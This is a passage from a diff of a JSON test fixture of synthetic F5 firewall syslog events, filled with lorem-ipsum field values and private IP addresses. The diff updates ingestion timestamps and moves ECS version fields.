bigip_mgmt_ip=10.46.115.216 context_name=equun context_type=sitvo date_time=Feb 03 2017 21:16:50 dest_ip=10.223.198.146 dst_geo=iciad dest_port=7874 device_product=mad device_vendor=onse device_version=1.380 drop_reason=mipsum errdefs_msgno=lmo errdefs_msg_name=aliquamq flow_id=dtempori ip_protocol=rdp severity=medium partition_name=voluptat route_domain=ugit sa_translation_pool=tatem sa_translation_type=metcons source_ip=10.252.102.110 src_geo=henderit source_port=7829 source_user=perspici translated_dest_ip=10.184.59.148 translated_dest_port=6933 translated_ip_protocol=queips translated_route_domain=midest 
translated_source_ip=10.12.129.137 translated_source_port=721 translated_vlan=orroqu vlan=472", "event": { - "ingested": "2021-06-09T10:31:51.965325200Z" + "ingested": "2021-12-14T14:42:50.150087511Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "labore uela ntexplic4824.internal.localhost dolorsit archite remq [F5@veniamq acl_policy_name=occ acl_policy_type=oloreseo acl_rule_name=iruredol action=Established hostname=derit5270.mail.local bigip_mgmt_ip=10.105.52.140 context_name=ntexpl context_type=dunt date_time=Feb 18 2017 04:19:24 dest_ip=10.20.55.199 dst_geo=nder dest_port=3238 device_product=itanim device_vendor=nesciun device_version=1.1729 drop_reason=mollita errdefs_msgno=tatem errdefs_msg_name=iae flow_id=quido ip_protocol=ipv6-icmp severity=very-high partition_name=inBC route_domain=mol sa_translation_pool=tur sa_translation_type=ictas source_ip=10.81.184.7 src_geo=saquaea source_port=6344 source_user=eetd translated_dest_ip=10.155.204.243 translated_dest_port=459 translated_ip_protocol=lorsi translated_route_domain=repreh translated_source_ip=10.199.194.79 translated_source_port=7713 translated_vlan=illumqui vlan=3414", "event": { - "ingested": "2021-06-09T10:31:51.965330900Z" + "ingested": "2021-12-14T14:42:50.150087914Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amali ate idolor3916.www5.home tas autfugi tasun [F5@duntutla acl_policy_name=ntium acl_policy_type=iration acl_rule_name=umwritte action=Closed hostname=orisni5238.mail.lan bigip_mgmt_ip=10.177.238.45 context_name=iumt context_type=tsed date_time=Mar 04 2017 11:21:59 dest_ip=10.249.120.78 dst_geo=unte dest_port=893 device_product=ueipsa device_vendor=scipitl device_version=1.1453 drop_reason=aparia errdefs_msgno=tatnon errdefs_msg_name=leumiur flow_id=tetura ip_protocol=ggp severity=very-high partition_name=oluptat 
route_domain=metco sa_translation_pool=acom sa_translation_type=ceroinB source_ip=10.110.2.166 src_geo=exeacomm source_port=79 source_user=taliqui translated_dest_ip=10.18.226.72 translated_dest_port=5140 translated_ip_protocol=olupta translated_route_domain=tsuntinc translated_source_ip=10.251.231.142 translated_source_port=872 translated_vlan=urExcep vlan=102", "event": { - "ingested": "2021-06-09T10:31:51.965336Z" + "ingested": "2021-12-14T14:42:50.150088314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "suntex iacons occaec7487.corp quaeab fici imve [F5@quide acl_policy_name=quaU acl_policy_type=undeomni acl_rule_name=accusa action=Established hostname=iutali7297.www.domain bigip_mgmt_ip=10.190.122.27 context_name=mporainc context_type=xea date_time=Mar 18 2017 18:24:33 dest_ip=10.123.113.152 dst_geo=billo dest_port=2618 device_product=radipisc device_vendor=Cice device_version=1.6332 drop_reason=vitaed errdefs_msgno=ser errdefs_msg_name=etconsec flow_id=elillum ip_protocol=tcp severity=high partition_name=rnat route_domain=eprehend sa_translation_pool=rem sa_translation_type=edolo source_ip=10.99.202.229 src_geo=eosquira source_port=4392 source_user=lloinven translated_dest_ip=10.100.199.226 translated_dest_port=7617 translated_ip_protocol=apariatu translated_route_domain=lorsita translated_source_ip=10.192.98.247 translated_source_port=4308 translated_vlan=temaccu vlan=5302", "event": { - "ingested": "2021-06-09T10:31:51.965341Z" + "ingested": "2021-12-14T14:42:50.150088728Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uptassit ncidi tlabori4803.www5.local oconse mag tob [F5@dolores acl_policy_name=equamnih acl_policy_type=taliqui acl_rule_name=eiu action=Drop hostname=orumw5960.www5.home bigip_mgmt_ip=10.248.111.207 context_name=dolor context_type=tiumto date_time=Apr 02 2017 
01:27:07 dest_ip=10.38.28.151 dst_geo=nrepreh dest_port=5251 device_product=equep device_vendor=ever device_version=1.6463 drop_reason=atq errdefs_msgno=erspi errdefs_msg_name=iqu flow_id=niamqu ip_protocol=rdp severity=medium partition_name=icab route_domain=sBonor sa_translation_pool=fugits sa_translation_type=mipsumqu source_ip=10.172.154.97 src_geo=admi source_port=7165 source_user=culpaq translated_dest_ip=10.162.97.197 translated_dest_port=4357 translated_ip_protocol=tcupida translated_route_domain=isa translated_source_ip=10.37.193.70 translated_source_port=170 translated_vlan=tesseq vlan=7693", "event": { - "ingested": "2021-06-09T10:31:51.965346600Z" + "ingested": "2021-12-14T14:42:50.150089139Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pernat rerepre nculpaq3821.www5.invalid billoinv sci col [F5@obea acl_policy_name=emp acl_policy_type=agnaaliq acl_rule_name=est action=Reject hostname=oinv5493.internal.domain bigip_mgmt_ip=10.36.63.31 context_name=nisiu context_type=imad date_time=Apr 16 2017 08:29:41 dest_ip=10.30.101.79 dst_geo=itasp dest_port=4927 device_product=sitametc device_vendor=onsequa device_version=1.3912 drop_reason=ntmo errdefs_msgno=loreeu errdefs_msg_name=temse flow_id=aspernat ip_protocol=ipv6 severity=very-high partition_name=caecat route_domain=rautod sa_translation_pool=olest sa_translation_type=eataev source_ip=10.171.221.230 src_geo=edquia source_port=1977 source_user=otamr translated_dest_ip=10.222.165.250 translated_dest_port=2757 translated_ip_protocol=amvolu translated_route_domain=mip translated_source_ip=10.45.35.180 translated_source_port=653 translated_vlan=maccusa vlan=7248", "event": { - "ingested": "2021-06-09T10:31:51.965351700Z" + "ingested": "2021-12-14T14:42:50.150089524Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nimad ataevita 
oremqu542.internal.localhost uteir boree isn [F5@ulla acl_policy_name=equatDu acl_policy_type=pta acl_rule_name=enbyCi action=Reject hostname=tnonproi195.api.home bigip_mgmt_ip=10.238.4.219 context_name=uide context_type=scivel date_time=Apr 30 2017 15:32:16 dest_ip=10.150.9.246 dst_geo=meumfugi dest_port=7010 device_product=emaperia device_vendor=Section device_version=1.4329 drop_reason=iame errdefs_msgno=orroquis errdefs_msg_name=aquio flow_id=riatu ip_protocol=udp severity=low partition_name=tanimid route_domain=isnostru sa_translation_pool=nofdeFi sa_translation_type=aquioff source_ip=10.1.171.61 src_geo=amnisi source_port=7258 source_user=reetdolo translated_dest_ip=10.199.127.211 translated_dest_port=3598 translated_ip_protocol=ilmole translated_route_domain=ugi translated_source_ip=10.83.238.145 translated_source_port=5392 translated_vlan=emveleum vlan=3661", "event": { - "ingested": "2021-06-09T10:31:51.965356400Z" + "ingested": "2021-12-14T14:42:50.150089969Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nde abillo undeom845.www5.example quaer eetdo tlab [F5@spernatu acl_policy_name=exercita acl_policy_type=sBonorum acl_rule_name=atems action=Drop hostname=edictasu5362.internal.localhost bigip_mgmt_ip=10.65.141.244 context_name=turmag context_type=ipsaqu date_time=May 14 2017 22:34:50 dest_ip=10.203.69.36 dst_geo=quira dest_port=3091 device_product=ore device_vendor=tation device_version=1.3789 drop_reason=porincid errdefs_msgno=tperspic errdefs_msg_name=equu flow_id=sintoc ip_protocol=rdp severity=very-high partition_name=tetura route_domain=riosamni sa_translation_pool=icta sa_translation_type=luptate source_ip=10.170.252.219 src_geo=iqui source_port=1978 source_user=Nequepo translated_dest_ip=10.44.226.104 translated_dest_port=7020 translated_ip_protocol=nse translated_route_domain=veniam translated_source_ip=10.74.213.42 translated_source_port=5922 
translated_vlan=sse vlan=2498", "event": { - "ingested": "2021-06-09T10:31:51.965363700Z" + "ingested": "2021-12-14T14:42:50.150090395Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inBCSe otamrem tutlabor4180.internal.host consecte pteurs catcupi [F5@autf acl_policy_name=saqu acl_policy_type=uptat acl_rule_name=unt action=Reject hostname=uido492.www5.home bigip_mgmt_ip=10.180.48.221 context_name=lors context_type=aconsequ date_time=May 29 2017 05:37:24 dest_ip=10.33.195.166 dst_geo=sequat dest_port=4596 device_product=utemvel device_vendor=epteur device_version=1.2965 drop_reason=iusm errdefs_msgno=roi errdefs_msg_name=busBonor flow_id=stquido ip_protocol=igmp severity=high partition_name=mnisi route_domain=usmo sa_translation_pool=iamea sa_translation_type=imaveni source_ip=10.183.223.149 src_geo=cor source_port=2648 source_user=nihil translated_dest_ip=10.225.255.211 translated_dest_port=5595 translated_ip_protocol=citati translated_route_domain=uamei translated_source_ip=10.225.141.172 translated_source_port=956 translated_vlan=fugiatn vlan=3309", "event": { - "ingested": "2021-06-09T10:31:51.965368800Z" + "ingested": "2021-12-14T14:42:50.150090912Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aaliq nat uovolupt307.internal.host serror onse umquam [F5@emagn acl_policy_name=emulla acl_policy_type=mips acl_rule_name=itae action=Established hostname=redo6311.api.invalid bigip_mgmt_ip=10.176.64.28 context_name=olup context_type=remipsu date_time=Jun 12 2017 12:39:58 dest_ip=10.92.6.176 dst_geo=mcorpor dest_port=7420 device_product=autfugit device_vendor=emUte device_version=1.7612 drop_reason=nturmag errdefs_msgno=tura errdefs_msg_name=osquirat flow_id=equat ip_protocol=tcp severity=high partition_name=usantiu route_domain=idunt sa_translation_pool=atqu sa_translation_type=naturau 
source_ip=10.97.138.181 src_geo=oluptat source_port=7128 source_user=eseruntm translated_dest_ip=10.205.174.181 translated_dest_port=766 translated_ip_protocol=olor translated_route_domain=etquasia translated_source_ip=10.169.123.103 translated_source_port=519 translated_vlan=uisa vlan=6863", "event": { - "ingested": "2021-06-09T10:31:51.965373500Z" + "ingested": "2021-12-14T14:42:50.150091303Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Cicero evolupta teturadi4718.api.local piscivel hend eacommo [F5@ueip acl_policy_name=maliqu acl_policy_type=iati acl_rule_name=minim action=Established hostname=dolorem1698.www.domain bigip_mgmt_ip=10.75.120.11 context_name=urau context_type=etur date_time=Jun 26 2017 19:42:33 dest_ip=10.20.73.247 dst_geo=laborum dest_port=5749 device_product=xeac device_vendor=umdolors device_version=1.4226 drop_reason=uiadolo errdefs_msgno=empor errdefs_msg_name=umexerci flow_id=duntut ip_protocol=ggp severity=very-high partition_name=prehend route_domain=eufug sa_translation_pool=roquisq sa_translation_type=temporai source_ip=10.53.101.131 src_geo=ici source_port=5097 source_user=tquo translated_dest_ip=10.204.4.40 translated_dest_port=271 translated_ip_protocol=sitvo translated_route_domain=ine translated_source_ip=10.169.101.161 translated_source_port=4577 translated_vlan=ipi vlan=4211", "event": { - "ingested": "2021-06-09T10:31:51.965378400Z" + "ingested": "2021-12-14T14:42:50.150091806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "exerci idata ese4384.mail.domain rumexerc isiutali iquidexe [F5@illumq acl_policy_name=luptatem acl_policy_type=ite acl_rule_name=tasnul action=Reject hostname=evitae7333.www.lan bigip_mgmt_ip=10.28.51.219 context_name=ess context_type=quiad date_time=Jul 11 2017 02:45:07 dest_ip=10.43.210.236 dst_geo=litanim dest_port=2135 
device_product=orsitam device_vendor=modico device_version=1.2990 drop_reason=itatio errdefs_msgno=porinc errdefs_msg_name=riame flow_id=riat ip_protocol=udp severity=very-high partition_name=eriam route_domain=pernat sa_translation_pool=udan sa_translation_type=archi source_ip=10.6.222.112 src_geo=aliqu source_port=780 source_user=onsequu translated_dest_ip=10.156.117.169 translated_dest_port=2939 translated_ip_protocol=agnamal translated_route_domain=quei translated_source_ip=10.87.120.87 translated_source_port=1636 translated_vlan=teni vlan=4967", "event": { - "ingested": "2021-06-09T10:31:51.965383Z" + "ingested": "2021-12-14T14:42:50.150092332Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dant etdolor uat7787.www.host iti nimadm nculp [F5@asp acl_policy_name=eacom acl_policy_type=mag acl_rule_name=gelitse action=Drop hostname=arc2412.mail.lan bigip_mgmt_ip=10.247.44.59 context_name=eiusmo context_type=ainc date_time=Jul 25 2017 09:47:41 dest_ip=10.173.129.72 dst_geo=ecill dest_port=6831 device_product=snu device_vendor=inibusB device_version=1.388 drop_reason=texplica errdefs_msgno=oco errdefs_msg_name=aboree flow_id=ainci ip_protocol=udp severity=high partition_name=pariatur route_domain=uames sa_translation_pool=umtotamr sa_translation_type=mquido source_ip=10.57.89.155 src_geo=rur source_port=3553 source_user=ntorever translated_dest_ip=10.253.167.17 translated_dest_port=2990 translated_ip_protocol=seos translated_route_domain=exercita translated_source_ip=10.4.126.103 translated_source_port=892 translated_vlan=tco vlan=3607", "event": { - "ingested": "2021-06-09T10:31:51.965387600Z" + "ingested": "2021-12-14T14:42:50.150092762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oluptate lit santi837.api.domain turadip dip idolo [F5@Ute acl_policy_name=ptassita acl_policy_type=caecatcu 
acl_rule_name=inBC action=Established hostname=olorsi2746.internal.localhost bigip_mgmt_ip=10.15.240.220 context_name=teir context_type=quep date_time=Aug 08 2017 16:50:15 dest_ip=10.63.78.66 dst_geo=xeac dest_port=7061 device_product=abor device_vendor=oreverit device_version=1.6451 drop_reason=reetdo errdefs_msgno=tat errdefs_msg_name=eufugia flow_id=ncididun ip_protocol=tcp severity=medium partition_name=periamea route_domain=itametco sa_translation_pool=vel sa_translation_type=quunt source_ip=10.248.206.210 src_geo=nonn source_port=4478 source_user=met translated_dest_ip=10.36.69.125 translated_dest_port=7157 translated_ip_protocol=entsu translated_route_domain=conse translated_source_ip=10.143.183.208 translated_source_port=5214 translated_vlan=umwri vlan=4057", "event": { - "ingested": "2021-06-09T10:31:51.965392600Z" + "ingested": "2021-12-14T14:42:50.150093161Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atura tur tur5914.internal.invalid tassita colabori imidestl [F5@piscing acl_policy_name=ceroi acl_policy_type=iconsequ acl_rule_name=iat action=Established hostname=edqu2208.www.localhost bigip_mgmt_ip=10.6.32.7 context_name=exerci context_type=inesciu date_time=Aug 22 2017 23:52:50 dest_ip=10.141.216.14 dst_geo=emu dest_port=5311 device_product=psa device_vendor=ate device_version=1.4386 drop_reason=fugitse errdefs_msgno=minimve errdefs_msg_name=serrorsi flow_id=tametco ip_protocol=ipv6-icmp severity=high partition_name=lore route_domain=isci sa_translation_pool=Dui sa_translation_type=reetdo source_ip=10.69.170.107 src_geo=iumtotam source_port=1010 source_user=ipitlabo translated_dest_ip=10.34.133.2 translated_dest_port=4807 translated_ip_protocol=nderi translated_route_domain=liqua translated_source_ip=10.142.186.43 translated_source_port=4691 translated_vlan=sautei vlan=2363", "event": { - "ingested": "2021-06-09T10:31:51.965397600Z" + "ingested": 
"2021-12-14T14:42:50.150093547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "voluptas velill rspic5453.www.local meum borumSec aecatcup [F5@snisiut acl_policy_name=siar acl_policy_type=quas acl_rule_name=occaeca action=Closed hostname=ender5647.www5.example bigip_mgmt_ip=10.142.22.24 context_name=ulamc context_type=cept date_time=Sep 06 2017 06:55:24 dest_ip=10.93.88.228 dst_geo=rchitect dest_port=3402 device_product=gna device_vendor=ici device_version=1.2026 drop_reason=olu errdefs_msgno=iameaque errdefs_msg_name=identsun flow_id=ender ip_protocol=ipv6 severity=low partition_name=tect route_domain=uiad sa_translation_pool=doconse sa_translation_type=eni source_ip=10.121.153.197 src_geo=smoditem source_port=6593 source_user=borumSec translated_dest_ip=10.59.103.10 translated_dest_port=768 translated_ip_protocol=oquisq translated_route_domain=abori translated_source_ip=10.170.165.164 translated_source_port=505 translated_vlan=uiineavo vlan=5554", "event": { - "ingested": "2021-06-09T10:31:51.965402400Z" + "ingested": "2021-12-14T14:42:50.150093941Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uidexeac sequa ntsunti2313.internal.invalid uinesc cid emi [F5@Bonorum acl_policy_name=lesti acl_policy_type=oreseo acl_rule_name=reprehen action=Established hostname=sis3986.internal.lan bigip_mgmt_ip=10.133.10.122 context_name=texplic context_type=edutp date_time=Sep 20 2017 13:57:58 dest_ip=10.93.59.189 dst_geo=eserun dest_port=3034 device_product=eniamqu device_vendor=inimav device_version=1.1576 drop_reason=imadm errdefs_msgno=uta errdefs_msg_name=tisu flow_id=remagnam ip_protocol=icmp severity=low partition_name=meiusm route_domain=nidolo sa_translation_pool=atquovol sa_translation_type=quunt source_ip=10.247.114.30 src_geo=olesti source_port=7584 source_user=quaeabil 
translated_dest_ip=10.19.99.129 translated_dest_port=956 translated_ip_protocol=itesse translated_route_domain=iamqui translated_source_ip=10.176.83.7 translated_source_port=5908 translated_vlan=inim vlan=6806", "event": { - "ingested": "2021-06-09T10:31:51.965407600Z" + "ingested": "2021-12-14T14:42:50.150094324Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Sed oremeumf lesti5921.api.localhost enima tnulapar ico [F5@giatquo acl_policy_name=lors acl_policy_type=its acl_rule_name=dolor action=Drop hostname=uatu2894.api.lan bigip_mgmt_ip=10.64.139.17 context_name=pro context_type=ice date_time=Oct 04 2017 21:00:32 dest_ip=10.87.238.169 dst_geo=conse dest_port=5351 device_product=mcol device_vendor=lup device_version=1.3824 drop_reason=upta errdefs_msgno=sedquian errdefs_msg_name=cti flow_id=rumSecti ip_protocol=rdp severity=medium partition_name=eca route_domain=oluptate sa_translation_pool=Duisa sa_translation_type=consequa source_ip=10.40.177.138 src_geo=aevitaed source_port=1082 source_user=rep translated_dest_ip=10.8.29.219 translated_dest_port=6890 translated_ip_protocol=quaeratv translated_route_domain=involu translated_source_ip=10.70.7.23 translated_source_port=2758 translated_vlan=amcolab vlan=4306", "event": { - "ingested": "2021-06-09T10:31:51.965412500Z" + "ingested": "2021-12-14T14:42:50.150094714Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "odic iuta liquaUte209.internal.test olores scipit lloinve [F5@borisnis acl_policy_name=onorumet acl_policy_type=ptatema acl_rule_name=eavolup action=Closed hostname=rmagnido5483.local bigip_mgmt_ip=10.180.62.222 context_name=ptatev context_type=atu date_time=Oct 19 2017 04:03:07 dest_ip=10.234.26.132 dst_geo=msequ dest_port=2383 device_product=mwritten device_vendor=tat device_version=1.6066 drop_reason=osa errdefs_msgno=mini 
errdefs_msg_name=rors flow_id=ssusci ip_protocol=udp severity=medium partition_name=inimve route_domain=uio sa_translation_pool=mexercit sa_translation_type=byC source_ip=10.2.189.20 src_geo=orin source_port=535 source_user=uptasnul translated_dest_ip=10.67.221.220 translated_dest_port=239 translated_ip_protocol=aedict translated_route_domain=niamqui translated_source_ip=10.67.173.228 translated_source_port=5767 translated_vlan=tatemse vlan=4493", "event": { - "ingested": "2021-06-09T10:31:51.965417100Z" + "ingested": "2021-12-14T14:42:50.150095106Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uamestqu mpor orem6479.api.host seq rumSe tatnonp [F5@ommo acl_policy_name=adeser acl_policy_type=uasiarc acl_rule_name=doeiu action=Reject hostname=uian521.www.example bigip_mgmt_ip=10.209.52.47 context_name=imven context_type=onnumqua date_time=Nov 02 2017 11:05:41 dest_ip=10.141.201.173 dst_geo=upt dest_port=6017 device_product=itautfu device_vendor=nesci device_version=1.5040 drop_reason=mquis errdefs_msgno=lorsi errdefs_msg_name=tetura flow_id=eeufug ip_protocol=ipv6 severity=medium partition_name=tevelite route_domain=tocca sa_translation_pool=orsitvol sa_translation_type=ntor source_ip=10.147.127.181 src_geo=minimav source_port=6994 source_user=tasu translated_dest_ip=10.56.134.118 translated_dest_port=358 translated_ip_protocol=evo translated_route_domain=mcorpori translated_source_ip=10.196.176.243 translated_source_port=3465 translated_vlan=orsitam vlan=4991", "event": { - "ingested": "2021-06-09T10:31:51.965421700Z" + "ingested": "2021-12-14T14:42:50.150095500Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "prehende lup tpers2217.internal.lan nula tdolorem qui [F5@olupt acl_policy_name=nemulla acl_policy_type=asp acl_rule_name=dexercit action=Closed hostname=taliq5213.api.corp 
bigip_mgmt_ip=10.226.24.84 context_name=ectobea context_type=dat date_time=Nov 16 2017 18:08:15 dest_ip=10.91.18.221 dst_geo=aut dest_port=5596 device_product=uames device_vendor=tconsec device_version=1.7604 drop_reason=oll errdefs_msgno=laboree errdefs_msg_name=udantiu flow_id=itametco ip_protocol=ipv6 severity=very-high partition_name=odico route_domain=rsint sa_translation_pool=itl sa_translation_type=ttenb source_ip=10.231.18.90 src_geo=lapa source_port=4860 source_user=Nem translated_dest_ip=10.85.13.237 translated_dest_port=4072 translated_ip_protocol=upidata translated_route_domain=ici translated_source_ip=10.248.140.59 translated_source_port=5760 translated_vlan=ident vlan=4293", "event": { - "ingested": "2021-06-09T10:31:51.965426400Z" + "ingested": "2021-12-14T14:42:50.150095892Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quelaud luptat rinrep6482.api.lan nimv emeu tatemac [F5@quisn acl_policy_name=rem acl_policy_type=ulamcola acl_rule_name=remagnaa action=Accept hostname=ntsunt4894.mail.domain bigip_mgmt_ip=10.203.46.215 context_name=mcorpori context_type=orisn date_time=Dec 01 2017 01:10:49 dest_ip=10.88.194.242 dst_geo=mco dest_port=6246 device_product=itame device_vendor=tenat device_version=1.5407 drop_reason=yCiceroi errdefs_msgno=nostrum errdefs_msg_name=orroquis flow_id=eumi ip_protocol=icmp severity=low partition_name=aea route_domain=tvolu sa_translation_pool=dutper sa_translation_type=tlaboru source_ip=10.207.183.204 src_geo=equuntu source_port=2673 source_user=eruntmo translated_dest_ip=10.8.224.72 translated_dest_port=6506 translated_ip_protocol=ion translated_route_domain=rured translated_source_ip=10.59.215.207 translated_source_port=6195 translated_vlan=ore vlan=5842", "event": { - "ingested": "2021-06-09T10:31:51.965431200Z" + "ingested": "2021-12-14T14:42:50.150096371Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" 
] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xerc Nequep ametcon7485.www.test rro tuser ctasu [F5@irat acl_policy_name=sitame acl_policy_type=oinven acl_rule_name=natu action=Drop hostname=mexer3864.api.corp bigip_mgmt_ip=10.98.154.146 context_name=nula context_type=ameaquei date_time=Dec 15 2017 08:13:24 dest_ip=10.72.114.116 dst_geo=mquis dest_port=7760 device_product=olupta device_vendor=isno device_version=1.6814 drop_reason=ine errdefs_msgno=aeco errdefs_msg_name=rinrepr flow_id=dutp ip_protocol=ipv6-icmp severity=very-high partition_name=giatqu route_domain=rsint sa_translation_pool=rsi sa_translation_type=paq source_ip=10.73.84.95 src_geo=uisautem source_port=6701 source_user=sitam translated_dest_ip=10.255.145.22 translated_dest_port=6949 translated_ip_protocol=emUtenim translated_route_domain=ende translated_source_ip=10.230.38.148 translated_source_port=3213 translated_vlan=sse vlan=368", "event": { - "ingested": "2021-06-09T10:31:51.965435900Z" + "ingested": "2021-12-14T14:42:50.150096839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "incidi aedictas rumetMa2554.domain unt liq abore [F5@iumdo acl_policy_name=oreeu acl_policy_type=mea acl_rule_name=ssec action=Accept hostname=oluptat6960.www5.test bigip_mgmt_ip=10.211.29.187 context_name=ptat context_type=meaquei date_time=Dec 29 2017 15:15:58 dest_ip=10.228.204.249 dst_geo=eleumi dest_port=4584 device_product=porissus device_vendor=imip device_version=1.7160 drop_reason=ddoe errdefs_msgno=uptateve errdefs_msg_name=ured flow_id=ctetu ip_protocol=tcp severity=low partition_name=uasiarch route_domain=Malor sa_translation_pool=boriosa sa_translation_type=cillumdo source_ip=10.166.142.198 src_geo=oremipsu source_port=465 source_user=tium translated_dest_ip=10.105.120.162 translated_dest_port=2984 translated_ip_protocol=etc translated_route_domain=eturadip translated_source_ip=10.175.181.138 
translated_source_port=3787 translated_vlan=tassitas vlan=1495", "event": { - "ingested": "2021-06-09T10:31:51.965440900Z" + "ingested": "2021-12-14T14:42:50.150097296Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velite maccus nima5813.mail.example iarchit sBonorum moenimi [F5@lor acl_policy_name=auto acl_policy_type=rsinto acl_rule_name=ati action=Established hostname=fugiatnu2498.www.localhost bigip_mgmt_ip=10.182.213.195 context_name=tconse context_type=eumf date_time=Jan 12 2018 22:18:32 dest_ip=10.200.94.145 dst_geo=doconse dest_port=5211 device_product=uis device_vendor=lill device_version=1.6057 drop_reason=imi errdefs_msgno=animi errdefs_msg_name=edutpers flow_id=pisci ip_protocol=tcp severity=very-high partition_name=umto route_domain=xercit sa_translation_pool=lam sa_translation_type=asnu source_ip=10.122.133.162 src_geo=eriam source_port=4838 source_user=aquae translated_dest_ip=10.220.202.102 translated_dest_port=10 translated_ip_protocol=iaturE translated_route_domain=epor translated_source_ip=10.195.139.25 translated_source_port=5566 translated_vlan=tper vlan=4341", "event": { - "ingested": "2021-06-09T10:31:51.965446Z" + "ingested": "2021-12-14T14:42:50.150097781Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tconsect pariat iutal3376.api.corp isi idexeac ntu [F5@tdolo acl_policy_name=nimve acl_policy_type=duntut acl_rule_name=emporin action=Reject hostname=ptat3230.domain bigip_mgmt_ip=10.156.208.5 context_name=tlaboru context_type=tec date_time=Jan 27 2018 05:21:06 dest_ip=10.9.69.13 dst_geo=uatD dest_port=6508 device_product=antium device_vendor=remaper device_version=1.3297 drop_reason=ntNequ errdefs_msgno=anim errdefs_msg_name=uae flow_id=ata ip_protocol=tcp severity=very-high partition_name=paq route_domain=emipsumq sa_translation_pool=culpaq sa_translation_type=quamq 
source_ip=10.53.72.161 src_geo=pta source_port=4723 source_user=scip translated_dest_ip=10.33.143.163 translated_dest_port=5404 translated_ip_protocol=iusmodi translated_route_domain=esciun translated_source_ip=10.247.144.9 translated_source_port=2494 translated_vlan=lit vlan=4112", "event": { - "ingested": "2021-06-09T10:31:51.965451100Z" + "ingested": "2021-12-14T14:42:50.150098168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oidentsu oditau onsec1632.internal.lan lup aeca isau [F5@giat acl_policy_name=ttenb acl_policy_type=eirure acl_rule_name=boreetd action=Closed hostname=exer447.internal.localhost bigip_mgmt_ip=10.35.190.164 context_name=radipis context_type=lore date_time=Feb 10 2018 12:23:41 dest_ip=10.76.99.144 dst_geo=eufugia dest_port=2345 device_product=pariat device_vendor=nimip device_version=1.2476 drop_reason=usci errdefs_msgno=unturmag errdefs_msg_name=dexeaco flow_id=lupta ip_protocol=ggp severity=very-high partition_name=oreeufug route_domain=Quisa sa_translation_pool=quiav sa_translation_type=ctionofd source_ip=10.21.58.162 src_geo=uisautei source_port=7881 source_user=porin translated_dest_ip=10.241.143.145 translated_dest_port=6151 translated_ip_protocol=ecillum translated_route_domain=olor translated_source_ip=10.113.65.192 translated_source_port=7807 translated_vlan=conseq vlan=6079", "event": { - "ingested": "2021-06-09T10:31:51.965456Z" + "ingested": "2021-12-14T14:42:50.150098625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edutpers ctobeat upta4358.home orem inibus secte [F5@ctobeat acl_policy_name=onsec acl_policy_type=idestl acl_rule_name=litani action=Closed hostname=itanimi1934.home bigip_mgmt_ip=10.19.154.103 context_name=ittenb context_type=tobeatae date_time=Feb 24 2018 19:26:15 dest_ip=10.235.51.61 dst_geo=exe dest_port=1872 device_product=cia 
